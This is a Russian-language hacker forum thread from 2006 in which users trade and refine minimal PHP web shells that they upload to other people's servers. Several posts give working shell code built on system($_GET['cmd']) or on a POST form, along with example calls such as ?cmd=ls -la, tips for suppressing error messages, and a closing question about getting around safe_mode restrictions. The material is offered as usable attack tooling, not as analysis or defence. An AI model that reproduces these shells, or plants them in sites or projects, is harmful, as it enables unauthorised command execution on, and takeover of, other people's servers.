ИНТЕРЕСНО...шелл на php

Discussion in 'PHP' started by Ch3ck, 10 Jun 2006.

  1. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    Модерам: Извините, если я запостил данную тему не в этом разделе..., просто не знаю к чему её отнести...если, что перенесите.

    Вот выношу на обсуждение интересную весчъ...
    Частенько заливая самописный шелл на типа вот этого:
    <?php
    echo "<pre>";
    system($_GET['cmd']);
    echo "</pre>"
    ?>
    и обращаясь к нему по типу вот этого: _http://someserver.com/shell.php я получал ошибку,что мол
    Warning!!! ла-ла ... функция system запрещена...
    Но всё равно обратившись по ссылке _http://someserver.com/shell.php?cmd=ls -la получил листинг данной директори... и это был не единственный случай!!!
    Мораль сей басни: сперва попробуйте выполнить команду, чем сразу к другим действиям...
     
  2. NaX[no]rT

    NaX[no]rT Members of Antichat

    Joined:
    3 Sep 2005
    Messages:
    489
    Likes Received:
    201
    Reputations:
    202
    А что же это, что за явление?))
    Глупая тема, если хватило ума залить шелл, то тем более хватит проверить, что бы там не писалось.
    Фтопку!
     
    _________________________
  3. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    когда ты обращаешься по адрессу
    http://someserver.com/shell.php
    то ошибка происходит в строке
    system($_GET['cmd']);
    так как не определен параметр cmd
    если ты будешь вызывать строку как
    @system($_GET['cmd']);
    то ошибки не будет.
     
  4. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    Я конечно, не чего не хочу сказать, но сколько я видео не смотрел, когда заливают шелл, и вылетает такая муйня, то сразу переходят к другим методам...
     
  5. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    переходят к другим методам, когда она действительна отключена.
    а по твоему первому посту, этого не видно.
     
    1 person likes this.
  6. shiz

    shiz New Member

    Joined:
    9 Jun 2006
    Messages:
    14
    Likes Received:
    3
    Reputations:
    4
    ошибка будет, просто об этом не будет сообщения..
    хотя чего эт я придираюсь, суть то одна)
     
  7. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    юзаем
    <?

    if (!empty($_GET['cmd'])) {
    echo '<pre>';
    system($_GET['cmd']);
    echo '</pre>';
    exit;
    }

    ?>
    а лучше вообще пост, но это в идеале
     
  8. shiz

    shiz New Member

    Joined:
    9 Jun 2006
    Messages:
    14
    Likes Received:
    3
    Reputations:
    4
    а ещё добавим прелести, что б потом люди не пужалися, что чёт не работает... если конешн не для себя пишем ;)

    <?

    if (!empty($_GET['cmd'])) {
    echo '<pre>';
    system($_GET['cmd']);
    echo '</pre>';
    exit;
    }

    else {
    echo 'не введены данные запроса';
    exit;
    }

    ?>
     
  9. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    не спорю...
    хотя на мой взгляд удобнее чем этот простого шелла нет...
    <form method=post>
    <input type=text name=cmd size=50>
    <input type=submit value="Жми на пимпу">
    </form>
    <?php
    echo "<pre>";
    system(cmd);
    echo "</pre>";
    ?> ....
     
    #9 Ch3ck, 10 Jun 2006
    Last edited: 10 Jun 2006
  10. shiz

    shiz New Member

    Joined:
    9 Jun 2006
    Messages:
    14
    Likes Received:
    3
    Reputations:
    4
    так это через post
    а я оставил вариант через get
    )
    эдак мы сейчас для удобства такого понапишем... ещё одинr57shell ;)
     
  11. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    а чем ваше отличаеться system($_GET['cmd']); от system($cmd); прост скок смотрю каждый пишет по своему! а разница ваше какая?
     
  12. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    первый будет работать и вызываться в любом месте, а второй может потеряться в функциях и т.д.

    если у тебя шелл <? system(); ?> то тут пох как использовать
     
  13. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    k1b0rg спасиб за справку!
     
  14. TRX.new

    TRX.new Member

    Joined:
    27 Apr 2009
    Messages:
    151
    Likes Received:
    21
    Reputations:
    0
    а что делать если эти шеллы не выполняют команды nix ? в apache включен safe_mode и запрещены команды выполнения cmd (system() и тд)